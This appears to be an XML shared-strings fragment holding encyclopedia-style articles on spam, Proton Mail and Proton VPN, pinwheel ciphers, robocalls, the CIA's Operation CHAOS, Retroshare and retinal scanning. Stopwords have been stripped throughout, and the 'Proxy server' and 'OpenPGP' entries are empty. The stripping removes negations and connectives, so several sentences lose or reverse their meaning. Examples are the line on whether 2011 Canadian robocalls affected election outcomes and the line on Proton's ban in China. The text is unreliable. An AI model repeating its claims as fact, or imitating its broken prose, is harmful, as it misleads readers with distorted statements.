    <t>pills, porn poker, so-called common forms business e-mail spam forms spamvertising. many cases, sites dubious legality often fronts fraud. "pills" sold usually treatments impotence, real purported viagra cialis tablets, delivered without prescription, although prescription medicines also advertised. some pill advertisements suggest offer penis enlargement. pills actually delivered, typically counterfeit drugs. pornography websites also heavily advertised way, 2005) online poker websites. online poker since reduced since 2006 legislation puts restrictions online gambling united states. businesses transact business credit cards; many cases, spamvertised sites simply vehicles credit card fraud. recently, fake goods fake rolex watches appeared another common category spamvertised goods, along software, stock spam e-mails promoting particular stock. documented "unscientific" list subjects spam widely sent members 2003. alphabetical order: seen oprah bigger (also: satisfy partner, improve life) debt (also: special offer) action (also: teens, porn) lowest insurance rates (also: lower insurance now) lowest mortgage rates (also: lower mortgage rates, refinance, refi) online degree (also: online diploma) online pharmacy (also: online prescriptions, meds online) viagra online (also: xanax, valium, xenical, phentermine, soma, celebrex, valtrex, zyban, fioricet, adipex, etc.) work home (also: boss) references further reading james robinson (2005-09-11). "girlie mags must stay abreast net". observer.</t>
  </si>
  <si>
    <t>ProtonMail</t>
  </si>
  <si>
    <t>proton mail (also written protonmail) end-to-end encrypted email service founded 2013 geneva, switzerland. proton mail uses client-side encryption protect email content user data sent proton mail servers, unlike common email providers gmail outlook.com. service accessed webmail client, network, dedicated android apps.proton mail proton (formerly proton technologies), based canton geneva. company also operates proton vpn, proton drive proton calendar. proton mail received initial funding crowdfunding campaign. although default account setup free, service sustained optional paid services. initially invitation-only, proton mail opened public march 2016. 2017, proton mail million users, growing almost million 2022. history 2014, proton mail entered public beta. enough response three days needed temporarily suspend beta signups expand server capacity. months later, proton mail received us$550,377 10,576 donors crowdfunding campaign indiegogo, aiming us$100,000. during campaign, paypal froze proton mail's paypal account, thereby preventing withdrawal us$251,721 worth donations. paypal stated account frozen doubts legality encryption, statements opponents said unfounded. restrictions lifted following day.on march 2015, proton mail received us$2 million non-profit fondation genevoise pour l'innovation technologique (fongit) charles river ventures, although 2022, company longer venture capital investors. august 2015, proton mail released major version 2.0, included rewritten codebase interface. march 2016, proton mail released major version 3.0, official launch proton mail beta. with interface client, version also included public launch proton mail's android beta applications.on january 2017, proton mail announced onion site. november 2017, proton mail introduced proton mail contacts, zero-access encryption contacts manager. proton mail contacts also utilizes digital signatures verify integrity contacts data. december 2017, proton mail launched proton mail bridge, application provides end-to-end email encryption desktop client supports imap smtp, microsoft outlook, mozilla thunderbird, apple mail, windows macos.on july 2018, proton mail introduced address verification pretty good privacy (pgp) support, making proton mail interoperable clients.the source code back-end remains closed source. however, proton mail released source code interface open-source license. proton mail also open sourced mobile clients android, well proton mail bridge app. source code found github. september 2020, proton mail helped found coalition fairness, aims gain better conditions inclusion apps stores. proton also founded coalition competitive digital markets, brings together european tech companies supporting open, interoperable competitive digital markets. 2022, proton updated visuals, user interface, logos products, including proton mail, achieve consistent design throughout software. proton mail's subscription includes access proton vpn, proton calendar, proton drive. encryption proton mail uses combination public-key cryptography symmetric encryption protocols offer end-to-end encryption. when user creates proton mail account, browser generates pair public private keys: public used encrypt user's emails user data. private capable decrypting user's data symmetrically encrypted user's mailbox password.this symmetrical encryption happens user's browser using aes-256. upon account registration, user asked provide login password account. proton mail also offers users option two-password mode requires login password mailbox password. login password used authentication. mailbox password encrypts user's mailbox contains received emails, contacts, user information well private encryption key.upon logging user provide passwords. this access account encrypted mailbox private encryption key. decryption takes place client-side either browser apps. public encrypted private stored proton mail servers. thus proton mail stores decryption keys encrypted form proton mail developers unable retrieve user emails reset user mailbox passwords. this system absolves proton mail from: storing either unencrypted data mailbox password. divulging contents past emails future emails. decrypting mailbox requested compelled court order.proton mail exclusively supports https uses ephemeral exchange encrypt internet traffic users proton mail servers. protonmail.com holds "a+" rating qualys labs.in september 2015, proton mail added native support interface mobile pgp. this allows user export proton mail pgp-encoded public others outside proton mail, enabling email encryption. proton mail also supports encryption proton mail outside users. proton mail also support searching within encrypted message content. email sending email message sent proton mail account another automatically encrypted public recipient. once encrypted, private recipient decrypt message. when recipient logs mailbox password decrypts private unlocks inbox. email messages sent proton mail non-proton mail email addresses optionally sent plain text end-to-end encryption. with encryption, message encrypted user-supplied password. recipient receives link proton mail website enter password read decrypted message. proton mail assumes sender recipient exchanged password backchannel. such email messages self-destruct period time. location security both proton mail proton located switzerland avoid surveillance information requests countries fourteen eyes, and/or government surveillance laws like united states' patriot outside bounds law.the company claims also located switzerland strict privacy laws.proton mail currently supports two-factor authentication totp tokens login process. october 2019, according official proton mail blog, support yubikey fido physical security keys currently development available soon release v4.0.in 2021, proton mail's security cryptographic architecture independently audited securitum, leading european security auditing company, uncovered major issues security vulnerabilities, audit results publicly published. data portability proton mail limits data portability locking support external email client software imap pop3 protocols behind paywall. 2021, users unable back email account locally without paying. data centres proton mail maintains owns server hardware network order avoid utilizing third party. maintains data centres, lausanne another attinghausen former military bunker 1,000 metres (3,300 granite) backup. since servers located switzerland, legally outside jurisdiction european union, united states, countries. under swiss law, surveillance requests foreign countries must swiss court subject international treaties. prospective surveillance targets promptly notified appeal request court.each data centre uses load balancing across web, mail, servers, redundant power supply, hard drives full disk encryption, exclusive linux open-source software. december 2014, proton mail joined ripe effort direct control surrounding internet infrastructure. ddos attacks from november 2015, proton mail several ddos attacks made service largely unavailable users. during attacks, company stated twitter looking data center switzerland, saying, "many afraid magnitude attack us".in july 2018, proton mail reported suffering ddos attacks. andy claimed attackers paid unknown party launch attacks. september 2018, suspected proton mail attackers arrested british enforcement charged connection series high-profile cyberattacks schools airlines. blocks china april 2020, proton mail confirmed proton twitter proton mail proton banned china allow government spy. belarus november 2019, proton confirmed government republic belarus issued block across country proton mail proton addresses. block longer place four days later. explanation given proton mail block, block lifted. russia january 2020, russian federal service supervision communications, information technology mass media reported implemented complete block proton mail services within russian federation. reason block, cited proton mail's refusal give information relating accounts allegedly sent spam terror threats. however, proton mail claimed receive requests russian authorities regarding accounts. response block, proton mail twitter account recommended legitimate users circumvent block vpns tor. march 2020, company announced even though russia particularly successful service continues largely available russia without utilising vpn, proton mail releasing anti-censorship features proton mail proton desktop mobile apps allow block attempts automatically circumvented. compliance swiss court orders according proton mail's transparency report, legally obligated follow swiss court orders swiss broken, 2020 proton mail received 3,572 orders swiss authorities contested them. encryption utilized, proton mail unable hand contents encrypted emails circumstances, according proton's privacy policy, proton mail legally compelled addresses part swiss criminal investigation. reason, company strongly suggests users need hide identity swiss government hidden service/onion site. 2022, proton updated privacy policy made explicit separate privacy policy proton service, different treatment swiss strict no-logs policy also confirmed external audit.notable cases involving swiss court orders include case involving death threats made well-known immunologist anthony fauci case french citizens charged theft destruction property. after cases, october 2021, proton mail important swiss court victory confirmed email services cannot considered telecommunications providers, consequently subject data retention requirements imposed telecommunications providers. account types 2022, proton mail offers following plans: also comparison mail servers comparison webmail providers references external links official website source code protonmail's client github</t>
  </si>
  <si>
    <t>Proton VPN</t>
  </si>
  <si>
    <t>proton service operated swiss company proton company behind email service proton mail. according official website, proton proton mail share management team, offices, technical resources, operated proton's headquarters geneva, switzerland. company proton company behind proton email service proton mail, supported fongit (the fondation genevoise pour l'innovation technologique, non-profit foundation financed swiss federal commission technology innovation) european commission. features 2022, proton total 1,786 servers, sited different nations.all servers owned operated proton company's network. service available windows, macos, android, ios, also command-line tool linux implemented using ipsec protocol. proton also installed wireless router. proton utilizes openvpn (udp/tcp) ikev2 protocol, aes-256 encryption. company claims keep logs claims protect users webrtc leaks. january 2020, proton released source code platforms consult conduct independent security audit. july 2021, proton added wireguard protocol beta version. reception september 2019 review techradar, proton received four-and-a-half five stars. review read, "proton vpn's network small, performance issues testing. still, speeds generally better average, apps well-designed applaud genuine offers free, unlimited bandwidth plan." november 2018 review free version techradar writer concluded: live choice three locations, proton vpn's free plan excellent choice bandwidth limits, decent speeds, privacy policy believe (probably) clients desktops mobile devices. it's well worth checking out, backup existing service."a february 2019 magazine review rated proton saying "when first reviewed proton vpn, young service looking expand. certainly done that, service definitely better now. it's still unclear company able scale match competitors, given exacting standards physical security. that's worry future. right now, proton excellent service unbeatable range prices."the non-profit organization privacy guides, formerly called privacytools, developed comprehensive list provider criteria order objectively recommend vpns. october 2019, three vpns fulfilled criteria. proton second three recommended services. also comparison virtual private network services internet privacy encryption secure communication references</t>
  </si>
  <si>
    <t>Pink contract</t>
  </si>
  <si>
    <t>pink contract agreement email spammer spammer's internet service provider. contract exempts spammer provider's terms service, typically prohibit spamming. return, spammer pays money internet connection non-spammers. contract called pink color spam (the food), alluding fact contract enables spamming. references</t>
  </si>
  <si>
    <t>Pinwheel (cryptography)</t>
  </si>
  <si>
    <t>cryptography, pinwheel device producing short pseudorandom sequence bits (determined machine's initial settings), component cipher machine. pinwheel consisted rotating wheel certain number positions periphery. each position "pin", "cam" "lug" could either "set" "unset". wheel rotated, pins would turn affect parts machine, producing series "on" "off" pulses would repeat full rotation wheel. machine contained wheel, usually periods would relatively prime maximize combined period. pinwheels might turned purely mechanical action m-209) electromechanically lorenz 40/42). development swedish engineer boris caesar wilhelm hagelin credited invented first pinwheel device 1925. developed machine employed emanuel nobel oversee nobel interests aktiebolaget cryptograph. nephew founder nobel prize.the device later introduced france hagelin awarded french order merit, legion d'honneur, work. earliest cipher machines hagaelin developed c-38 later improved portable hagelin m-209. m-209 composed pinwheels rotating cage.other cipher machines used pinwheels include c-52, cd-57 siemens halske t52. pinwheels viewed predecessor electronic linear-feedback shift register (lfsr), used later cryptosystems. also rotor machine references</t>
  </si>
  <si>
    <t>Proxy server</t>
  </si>
  <si>
    <t>Robocall</t>
  </si>
  <si>
    <t>robocall phone call uses computerized autodialer deliver pre-recorded message, robot. robocalls often associated political telemarketing phone campaigns, also used public service emergency announcements. multiple businesses telemarketing companies auto-dialing software deliver prerecorded messages (appointment reminders, booking details, etc.) millions users. some robocalls personalized audio messages simulate actual personal phone call. service also associated prone scams.as june 2019 phone companies may, default, block incoming robocalls. history first description automated phone solicitation, i.e. robocalling, earliest applications proposed first microcomputers. first documented mention "memo publisher" david bunnell personal computing magazine, may/june 1977. under heading "personal computing abused", bunnell described presentation world altair computer convention march, 1976 intriguing business application personal computing". computer would sequentially dial phone numbers, play taped voice message, speech recognition respond additional messages appropriate. memo publisher, david bunnell reported "the proposal well received" conference. criticized "insensitive rights personal privacy" "could cause public uproar". north america canada robocalls legitimately used mainstream political parties canada reach voters. controversy surrounded robocalls 2011 canadian federal election, leading elections canada royal canadian mounted police investigate claims robocalls used attempt dissuade voters casting ballot falsely telling poll stations changed locations. elections canada traced origin automated calls disposable cellphone registered fictional name "pierre poutine" phony address area code joliette, quebec, issued subpoena cellphone provider produced list outgoing calls number. calls toll-free number used customers 2call.ca, subsidiary edmonton-based internet service provider racknine, phone record outgoing messages. burner cell phone belonging "pierre poutine" used contact owner racknine personal unlisted number gave name "pierre jones". this burner phone initiated series automated robocalls mostly guelph dozen ridings, targeted mostly non-conservative voters false voting location changes. some voters attended believe voting locations, sometimes destroyed voter registration cards anger.in november 2011, investigator served racknine production order records account holder associated bogus calls quickly identified. investigators also examined conservative party's cims voter database showed "pierre poutine" used conservative voter database select call. investigators blank entries specific login, leading speculation evidence deleted. paypal also surrendered records investigators since "pierre poutine" used paypal account bill automated calls. cost 2011, calls $162.10, elections canada said court filings. this expenditure never reported elections canada, required legitimate political spending. prime minister stephen harper conservative party canada denied knowledge involvement. conservative party staffer resigned soon scandal reported since come forward stating involved. elections canada made statement reported parliament, fraud extensive, affecting ridings provinces plus yukon territory. council canadians, left centre activist group, asserted robocalls enough swing result enough number ridings close races. court challenge initiated group overturn results election seven ridings, initiate by-elections respective seven house commons seats. after reviewing investigation "pierre poutine" scandal 2013, federal court judge richard mosley found election fraud taken place ridings across country found evidence conservative party candidates involved. also find sufficient evidence support charges ridings guelph. well, indicated "robocalls" affected outcome 2011 election riding.after lengthy investigation circumstances scandal, michael sona, former director communications conservative candidate guelph (ontario) riding charged june 2014 "wilfully preventing endeavouring prevent elector voting". sona found guilty november 2014 sentenced nine months jail plus twelve months probation. sona released jail bail serving twelve days, pending appeal sentence. however, sona appeal conviction. during trial, justice hearn agreed crown allegation sona likely acted alone. united states federal telephone consumer protection 1991 (tcpa) regulates automated calls. pre-recorded robocalls must identify initiating call include telephone number address whereby initiator reached. 2019, united states congress passed legislation expanding regulation robocalls. that year interim ruling seemed weaken restrictions autodialers. debt collection 2015, government debt collection exempted 1991 robocall restrictions; however, supreme court invalidated exception july 2020 barr american assn. political consultants, inc. (19-631). court decided first amendment violation favor "debt-collection speech political speech." political calls robocalls made many political parties united states, including limited republican democratic parties well unaffiliated campaigns, organizations, unions, individual citizens. political robocalls exempt united states national call registry. telephone consumer protection 1991 (tcpa) federal communications commission (fcc) regulations prohibit anyone (including charities, politicians political parties) making robocalls cell phone numbers without recipients' prior consent. permits non-commercial robocalls residential (non-cellular) telephone lines.some states according dmnews) laws regulate prohibit political robocalls. indiana north dakota prohibit automated political calls. hampshire, political robocalls allowed, except recipient national call registry. many states require disclosure paid call, often requiring notice recorded candidate's voice. patch-work state laws regulating political robocalls created problems national campaigns. california first political robo calls launched january 1983 business owner tony inocentes used telemarketing machine collection agency business announce candidacy 57th assembly district california. launched 300,000 automated calls losing november 1983 general election incumbent dave elder. inocentes founded gotv election company epolitical 1984.in 2001 inocentes invented political robo polling launching first political robo poll october 2001 lynwood, city council elections.california prohibits robocall unless existing relationship. california public utilities code 2871 seq. holds political campaigns rules organizations making calls automatic dialing–announcing device. guidelines are: person must come line recording identify nature call organization behind recipient call must consent recording played. call must disconnected telephone line soon message recipient hangs whichever comes first. indiana indiana requires introduction prerecorded message live operator; message played called party grants permission. missouri september 2008, then-missouri attorney general nixon alerted political campaigns missouri office would aggressively enforce federal rules (telephone consumer protection 1991) requiring calls include identifying contact information. north carolina robocalls made 2008 north carolina democratic primary, targeting african-american voters days leading primary late april 2008, essentially told registered voters registered. according facing south, calls made organization "women's voices women vote". voters watchdog groups complained turnout-suppression effort, state attorney general cooper ordered stop making calls. group stopped calls legal action taken. south carolina south carolina prohibiting types unsolicited consumer political robocalls, 2010, campaign consultant robert cahaly arrested south carolina state enforcement division, charged making illegal robocalls state house districts. automated opinion polling system asked whether u.s. speaker nancy pelosi invited campaign democratic candidates south carolina legislature. cahaly arrested despite written opinion state attorney general stating acted within law. charges subsequently dismissed october 2012. after charges dropped, cahaly filed suit state officials, claiming constitutional right free speech violated. u.s. district court judge, michelle childs ruled south carolina's anti-robocall statute content-based restriction speech therefore unconstitutional. proposed additional regulations california senator dianne feinstein (d-ca) introduced federal robocall privacy february 2008 senate committee rules administration hearing. proposed limit robocalls candidate, mandate candidates accurate caller numbers displayed, mandate disclosure paying call occur start call, rather call, mandate time call occur a.m. p.m. bill read twice, since received action session, become law. similar bills submitted subsequent years without success.shaun dakin, citizens civil discourse, testified hearing described robocalls affect lives voters across nation. also wrote op-ed washington post calling voter privacy bill rights voters would right political robocalls wish receive them.dakin, former john kerry campaign worker, website called stoppoliticalcalls.org claimed allow citizens receiving robocalls. however, guarantee registry stop calls since supports database essentially internet petition. mentioned above, robocall privacy failed become neither bill provisions do-not-call registry stopping robocalls.despite heavy media publicity database, seven politicians united states voluntarily pledged respect list 2008 general election cycle. seven, three made general election virginia foxx successfully reelected november 2008. september 2009, regulation federal trade commission went effect, banning robocalls without written opt-in receiver. political campaigns, surveys, charities, debt collectors, health care providers exempt, calls businesses. calls banks, insurers, phone companies jurisdiction ftc. situations federal jurisdiction, federal supersede slightly less restrictive state california. reverse robocalling june 2019 telephony-based scambaiting community launched bobrtc.tel, telephone directory tracks verified inbound telephone numbers reach contact centers operated known robocallers telephone scams. service also allows logged-in users place calls directly scammers using service's telephone numbers caller avoids user placing call handset, allows callers scam bait robocallers. auto warranty robocalls auto warranty robocalls series scam robocalls north america originating sumco panama company. call typically begins "we're trying reach extended warranty"; phishing scam intended trick caller calling provided number submit credit card details extend non-existent warranty. over billion fradulent robocalls made since 2021. beginning july 2022, federal communications commission ordered telecom providers cease carrying calls sumco panama company. suppressing unwanted illegal robocalls many robocalls wanted, several methods developed prevent unwanted robocalls. many countries operate call lists, lists ineffective legally problematic cases. consequently, market developed products allow consumers block robocalls. most products methods similar used mitigate spit (spam internet telephony) broadly categorised primary method used. however, complexity problem, single method sufficiently reliable. combination methods used together provide effective results, provided care taken ensure combination techniques would degrade user experience.solutions available hardware software products. mobile apps especially prevalent techniques require modification infrastructure. many products limited single medium, traditional copper landlines, mobile phone contracts specific mobile phone operator. blacklisting whitelisting simplest form, method offers ability prevent calls phone numbers, known source robocalls. many mobile apps prevent robocalls user generated blacklist. landlines standalone call blockers connect telephone. various models work blacklisting whitelisting principles. call blockers received attention publications including which? consumer reports united kingdom united states respectively.in operates service landlines called choose refuse allows customers block phone numbers choice monthly fee.a number physical products developed landlines. these typically installed homes employ hard coded irregularly updated blacklist. some models also function create user-generated whitelist. newer devices landlines cloud based data resolve hard coded blacklist issues allow create whitelist/blacklist. crowdsourcing sophisticated model uses crowdsourcing build comprehensive blacklist robocall numbers. notable example truecaller, requires users provide access personal whitelist genuine contacts exchange access larger crowdsourced database. 2013, hackers gained access truecaller's database known genuine numbers, highlighting danger centralising information. captcha building crowdsourcing model, primus canada launched patented product called telemarketing guard landlines 2007. improves previous models including captcha style challenge-response test. based database developed customer feedback, filters suspected telemarketing calls system challenges callers record name pressing button. name recorded, customer's phone rings caller telemarketing guard. answer phone, played recording, point accept call decline report realtime analysis major problem blacklisting whitelisting techniques practice caller spoofing, prevalent result barrier entry voip services market.in 2015 federal communications commission proposed framework telecommunications industry united states, included validation system network level robocalls sources 2017. final authentication task framework signing voip calls, would allow carriers reliably identify robocalls. until goals achieved, advanced method blocking robocalls uses real-time business intelligence techniques address constantly changing identities robocalls. with access large enough data sample, possible create algorithms detect call patterns without requiring reporting users. 2016, verizon sprint launched service based enhanced caller developed cequint incorporates whitelisting, blacklisting crowdsourcing techniques. improved accuracy, complemented technology called call guardian developed tns, performs caller behavior analysis billion public calls handle every year real time. call authentication resolve spoofing problem made call blocking based caller reputation problematic, starting mid-2017, intended culmination 2019, pushed forward caller certification implemented methodology called shaken/stir.(shken/stir (secure telephone identity revisited signature-based handling asserted information using tokens) june 2019, adopted rule allowing (but mandating) phone companies block unwanted robocalls default, without consumer opt-in; rule related source authentication still public comment period.the traced act, signed december 2019, requires implement caller authentication, requires report criminal robocalls justice department, gives consumers access robocall blocking charge, increases penalties violators. enforcement goal deal million plus complaints year, involving live caller. august 2016, "robocall strike force" thirty companies said would help crack problem.enforcement fines united states deterrence robocallers united states government rarely collects fines imposed federal communications commission ("fcc"). lacks authority collect fines forfeitures, robocallers voluntarily fine, department justice take action collect fine. federal communications commission orders declaratory rulings 2009 2009, response numerous complaints, federal trade commission asked federal court shut telemarketing campaign bombarding u.s. consumers hundreds millions allegedly deceptive robocalls effort sell vehicle service contracts guise extensions original vehicle warranties. took action promoter phony extended auto warranties, well telemarketing company hired carry illegal, deceptive campaign. contends companies operating massive telemarketing scheme uses random, pre-recorded phone calls deceive consumers thinking vehicle's warranty expire. consumers respond robocalls pressured purchase extended service contracts vehicles, telemarketers falsely portray extension manufacturer's original warranty. according papers filed court, however, robocalls prompted tens thousands complaints consumers either united states national call registry asked called. five telephone numbers associated defendants generated total 30,000 call complaints. consumers received robocalls home, work, cell phones, sometimes several times day. businesses, government offices even dispatchers subjected calls. those answer pre-recorded calls hear message telling vehicle warranty expire "extend coverage late". they told "press one" speak "warranty specialist". "specialists" mislead consumers believing company affiliated dealer manufacturer consumer's vehicle. they sell consumers service contract $2,000 $3,000, falsely portray extension vehicle's original warranty. seller extended auto warranties sued allegedly took million sale deceptively marketed service contracts. robocalls, companies dialed every phone number within particular area code prefix sequentially, without knowing whether consumers called motorists owned motor vehicles, whether consumers' numbers call registry. consumers asked calls stopped often "abusive behavior" simply hung according papers filed court. some defendants used offshore shell corporations avoid scrutiny, officer telemarketing company bragged prospective clients could operate outside without chance caught ftc, papers stated. this defendant also claimed makes million dials done million worth dialing extended warranty companies, including billion dials behalf largest client, according court papers filed ftc. addition robocalls, charged company selling warranties mails deceptive postcards consumers, warning imminent expiration auto warranties. postcards designed mislead consumers believing contacted dealer manufacturer, postcards offer consumers chance "renew" original warranties. 2009 u.s. district judge john grady issued temporary restraining order defendants transcontinental warranty inc. voice touch inc. grady's orders also applied transcontinental president christopher cowart, voice touch executives james maureen dunne, voice touch business partner network foundations network foundations executive damian kohlfeld. besides ordering halt automatic telephone sales calls, grady's order froze assets companies. alleged complaints calls part deceptive scheme asked court assure assets lost case might needed repay consumers victimized. immediately seeking civil fines companies later, agency officials said. attorneys general arkansas, indiana missouri taken similar actions calls offering extended warranties automobiles. 2015 after receiving 215,000 consumer complaints 2014 alone, u.s. federal communications commission (fcc) strengthened clarified regulations protecting consumers unwanted robocalls spam emails texts. commission issued package declaratory rulings june 2015 clarified provisions telephone consumer protection (tcpa) deal prerecorded artificial voice calls received residential wireline phones well wireless numbers. 2021 2021 federal communications commission ("fcc") released order imposing strict limits number non-telemarketing, prerecorded artificial voice calls made residential phone lines without prior consent. automated landline calls also required include opt-out mechanism, callers must implement fcc’s internal do-not-call list rules previously applied telemarketing calls.the order sets limit three calls consecutive 30-day period non-commercial calls, commercial calls contain advertisement calls charities. hipaa-related residential robocalls limited call three calls week. setting limits, interpreted traced require restrict number types calls consumers, despite arguments traced act’s language discretionary. 2022 international incoming robocalls blocked "from entering american phone networks." also can-spam 2003 cold calling google duplex telephones portal ringless voicemail truth caller 2009 voice broadcasting references external links national call registry complaints federal communications commission consumer complaint center phone calls reported u.s. federal commissions protecting consumers businesses fraudulent robocalls congressional research service stopping fraudulent robocall scams: more done?: hearing subcommittee consumer protection, product safety, insurance committee commerce, science, transportation, united states senate, hundred thirteenth congress, first session, july 2013</t>
  </si>
  <si>
    <t>Operation CHAOS</t>
  </si>
  <si>
    <t>operation chaos operation mhchaos central intelligence agency domestic espionage project targeting american people 1967 1974, established president lyndon johnson expanded president richard nixon, whose mission uncover possible foreign influence domestic race, anti-war protest movements. operation launched director central intelligence (dci) richard helms chief counter-intelligence james jesus angleton, headed richard ober. "mh" designation signify program worldwide area operations. background formed result national security 1947. charged collection, correlation, evaluation intelligence. while specify prohibition collecting domestic intelligence, restriction collect foreign intelligence, executive order 12333 1981 added prohibitions limit activities. began domestic recruiting operations 1959 process finding cuban exiles could used campaign cuba president fidel castro. operations expanded, formed domestic operations division 1964. 1965, president lyndon johnson requested begin investigation domestic dissent—independent fbi's ongoing cointelpro.the developed numerous operations targeting american dissidents many programs operated cia's office security, including: htlingual directed letters passing united states soviet union; program involved examination correspondence individuals organizations placed watchlist. project directed infiltration foreign intelligence targets agents posing dissident sympathizers which, like chaos, placed agents within domestic radical organizations purposes training establishment dissident credentials. project merrimac designed infiltrate domestic antiwar radical organizations thought pose threat security property personnel. project resistance worked college administrators, campus security local police identify anti-war activists political dissidents without infiltration taking place. scale operations when president richard nixon came office 1969, existing domestic surveillance activities consolidated operation chaos. operation chaos first used stations abroad report antiwar activities united states citizens traveling abroad, employing methods physical surveillance electronic eavesdropping, utilizing "liaison services" maintaining surveillance. operations later expanded include officers. 1969, following expansion, operation began developing network informants purposes infiltrating various foreign antiwar groups located foreign countries might ties domestic groups. eventually, officers expanded program include leftist counter-cultural groups discernible connection vietnam, groups operating within women's liberation movement. domestic spying operation chaos also targeted israeli embassy, domestic jewish groups b'nai b'rith. order gather intelligence embassy b'nai b'rith, purchased garbage collection company collect documents destroyed.targets operation chaos within antiwar movement included: students democratic society black panther party young lords women strike peace ramparts magazineat finality, operation chaos contained files 7,200 americans, computer index totaling 300,000 civilians approximately 1,000 groups. findings programs compile reports "illegal subversive" contacts united states civilian protesters "foreign elements" "might range casual contacts based merely mutual interest closely controlled channels party directives."dci richard helms informed president johnson november 1967, uncovered evidence contact prominent peace movement leaders foreign embassies u.s. abroad." helms repeated assessment 1969. total, reports compiled white house cabinet level officials. american public learns program secret program exposed investigative journalist seymour hersh 1974 article york times entitled huge operation reported against antiwar forces, other dissidents nixon years. amid uproar watergate break-in involving former officers, operation chaos closed 1973. further details revealed 1975 representative bella abzug's house subcommittee government information individual rights. government, response revelations, felt pressured enough launch commission activities within united states (the rockefeller commission), vice president nelson rockefeller, investigate depth surveillance. richard cheney, deputy white house chief staff, noted stated rockefeller commission avoid "... congressional efforts encroach executive branch."following revelations rockefeller commission, then-dci george bush admitted "the operation practice resulted improper accumulation material legitimate domestic activities." also echelon warrantless surveillance controversy project minaret project shamrock project megiddo project mockingbird references external links chaos, merrimac, resistance development surveillance technology risk abuse economic information operation chaos: cia's against sixties counter-culture final report select committee study governmental operations respect intelligence activities: united states senate intelligence collection americans: chaos office security transcriptions documents related operation mhchaos</t>
  </si>
  <si>
    <t>OpenPGP</t>
  </si>
  <si>
    <t>Retroshare</t>
  </si>
  <si>
    <t>retroshare free open-source peer-to-peer communication file sharing based friend-to-friend network built privacy guard (gpg). optionally, peers exchange certificates addresses friends vice versa. history retroshare founded 2004 mark fernie. there unofficial build single-board computer raspberry named pishare, since 2012.the website 'prism break' recommended retroshare anonymous file sharing since 2013.on november 2014, retroshare scored points electronic frontier foundation's secure messaging scorecard. lost point recent independent code audit.in august 2015, retroshare repository migrated sourceforge github. design retroshare instant messaging file sharing network uses distributed hash table address discovery. users communicate indirectly mutual friends request direct connections. features authentication connectivity after initial installation, user generates pair (gpg) cryptographic keys retroshare. after authentication exchanging asymmetric key, openssl used establish connection, end-to-end encryption. friends friends cannot connect default, other, users allow ipv6 support merged master branch released next version. file sharing possible share folders friends. file transfer carried using multi-hop swarming system (inspired "turtle hopping" feature turtle project, implemented differently). essence, data exchanged friends, although possible ultimate source destination given transfer multiple friends apart. search function performing anonymous multi-hop search another source finding files network. files represented sha-1 hash value, http-compliant file links exported, copied, pasted into/out retroshare publish virtual location retroshare network. communication services retroshare offers communication are: private chat; private mailing system allows secure communication known friends distant friends; public private multi-user chat lobbies; forum system allowing anonymous authenticated forums, distributes posts friends friends; channel system offers possibility auto-download files posted given channel every subscribed peer, similar feeds; posted links system, links important information shared; voip calls; video calls (since version 0.6.0); networks support, anonymisation (since version 0.6.0). user interface core retroshare software based offline library, executables plugged: command-line interface executable offers nearly control, useful "headless" server graphical user interface written users use. addition functions quite common file sharing software, search visualization transfers, retroshare gives users potential manage network collecting optional information neighboring friends visualizing trust matrix dynamic network graph. appearance changed choosing several available style sheets. anonymity friend-to-friend structure retroshare network makes difficult intrude hardly possible monitor external point view. degree anonymity improved deactivating ip/certificate exchange services, making retroshare network real dark net.friends friends connect directly other; however, user enable anonymous sharing files friends friends. search, access, upload download files made "routing" series friends. this means communication source data (the up-loader) destination data (the down-loader) indirect mutual friends. although intermediary friends cannot determine original source ultimate destination, next links communication chain (their friends). since data stream encrypted, original source ultimate destination able data transferred. caveats important remember retroshare's encryption makes virtually impossible another external observer know downloading uploading, limitation apply members user's retroshare circle trust; adding untrusted people potential risk.in 2012, german court granted injunction user retroshare sharing copyrighted music files. retroshare derives security fact transfers “trusted friends” users add. case, defendant added anti-piracy monitoring company friend, allowed traced aggregation opsec. also comparison file-sharing applications references external links official website</t>
  </si>
  <si>
    <t>Retinal scan</t>
  </si>
  <si>
    <t>retinal scan biometric technique uses unique patterns person's retina blood vessels. confused ocular-based technologies: iris recognition, commonly called "iris scan", vein verification uses scleral veins. introduction human retina thin tissue made neural cells located posterior portion eye. because complex structure capillaries supply retina blood, person's retina unique, making retinal scans emerging authentication method. network blood vessels retina entirely genetically determined thus even identical twins share similar pattern. although retinal patterns altered cases diabetes, glaucoma retinal degenerative disorders, retina typically remains unchanged birth death. unique unchanging nature, retina appears precise reliable biometric, aside dna. national center state courts estimate retinal scanning error rate million.a retinal scan performed casting unperceived beam low-energy infrared light person’s look scanner's eyepiece. this beam light traces standardized path retina. because retinal blood vessels absorb light readily surrounding tissue, amount reflection varies scan. pattern variations digitized stored database. history idea retinal identification first conceived carleton simon isadore goldstein published york state journal medicine 1935. idea ahead time, technology caught concept retinal scanning device emerged 1975. 1976, robert "buzz" hill formed corporation named eyedentify, inc., made full-time effort research develop device. 1978, specific means retinal scanner patented, followed commercial model 1981. popular culture because relative obscurity "high tech" nature retinal scans, frequently used device fiction suggest area particularly strongly secured intrusion. some notable examples include: movie star trek wrath khan (1982), admiral kirk gains access secret computer files retinal scan. science fiction novel long result john brunner (1965), retinal scanner used access remote control centre spaceport. movie batman (1966), batman describes robin tiny vessels retina unique individual, utilizing portable retina scan device batmobile, confirm identity penguin. comic book film series x-men charles xavier uses retinal scanner unlock cerebro. this bypassed shape-shifter mystique assuming form william stryker using unknown mechanism. half-life video game series, scientists black mesa frequently shown operating retinal scanners access locked doors hidden devices. characters films goldeneye (1995), mission: impossible (1996), barb wire (1996), entrapment (1999), minority report (2002) paycheck (2003) charlie's angels (film) (2000) utilize deceive retinal scanners. splinter cell video game series, retinal scanners used identify agents within third echelon guards within military/business complexes. 2012 film avengers, characters gain access quantity rare iridium using devices: apparently hooks onto victim's eyeball, another receives signals first holographically reconstruct retina fool scanner. 1993 film demolition (film), simon phoenix deceives retinal scanner taking eyeball prison doctor. uses retinal scanners typically used authentication identification purposes. retinal scanning utilized several government agencies including fbi, cia, nasa, also used prisons. retinal scanning also medical application. communicable illnesses aids, syphilis, malaria, chicken lyme disease well hereditary diseases like leukemia, lymphoma, sickle cell anemia affect eyes. pregnancy also affects eyes. likewise, indications chronic health conditions congestive heart failure, atherosclerosis, cholesterol issues first appear eyes. retinal scanning sometimes confused iris recognition, employed wider scope applications. pros cons advantages occurrence false positives extremely (almost false negative rates highly reliable people retinal pattern speedy results: identity subject verified quicklydisadvantages measurement accuracy affected disease cataracts measurement accuracy also affected severe astigmatism scanning procedure perceived invasive subject scanned must close camera optics high equipment cost 